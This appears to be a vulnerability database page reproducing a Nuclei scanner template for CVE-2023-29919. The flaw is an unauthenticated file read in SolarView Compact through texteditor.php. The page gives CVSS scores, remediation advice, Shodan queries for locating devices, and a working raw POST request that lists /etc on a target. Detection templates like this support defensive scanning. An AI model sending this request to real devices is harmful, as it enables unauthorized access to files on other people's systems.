Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-29919
HistoryMay 19, 2023 - 11:50 a.m.

SolarView Compact <= 6.00 - Local File Inclusion

2023-05-1911:50:08
ProjectDiscovery
github.com
25
cve-2023-29919
solarview
lfi
contec
edb

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

9.4 High

AI Score

Confidence

High

0.445 Medium

EPSS

Percentile

97.4%

There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php
id: CVE-2023-29919

info:
  name: SolarView Compact <= 6.00 - Local File Inclusion
  author: For3stCo1d
  severity: critical
  description: |
    There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade to a patched version of SolarView Compact or apply the vendor-provided security patch to mitigate the LFI vulnerability.
  reference:
    - https://github.com/xiaosed/CVE-2023-29919
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29919
    - https://www.solarview.io/
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-29919
    cwe-id: CWE-276
    epss-score: 0.54171
    epss-percentile: 0.97625
    cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact
    shodan-query:
      - http.html:"SolarView Compact"
      - cpe:"cpe:2.3:h:contec:solarview_compact"
  tags: cve,cve2023,lfi,solarview,edb,contec

http:
  - raw:
      - |
        POST /texteditor.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        directory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'action="texteditor.php"'
          - 'adduser.conf'
          - 'deluser.conf'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b2b60a759d1ea30666861f4fe152a5da9c502f8a2dae5e08a1f196fbb87c8fd5022030315f3ca3d819532851d2c6b5affe83eab39e97b60b9b4e65709c2b22b10ee4:922c64590222798bb761d5b6d8e72950

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

9.4 High

AI Score

Confidence

High

0.445 Medium

EPSS

Percentile

97.4%

Related for NUCLEI:CVE-2023-29919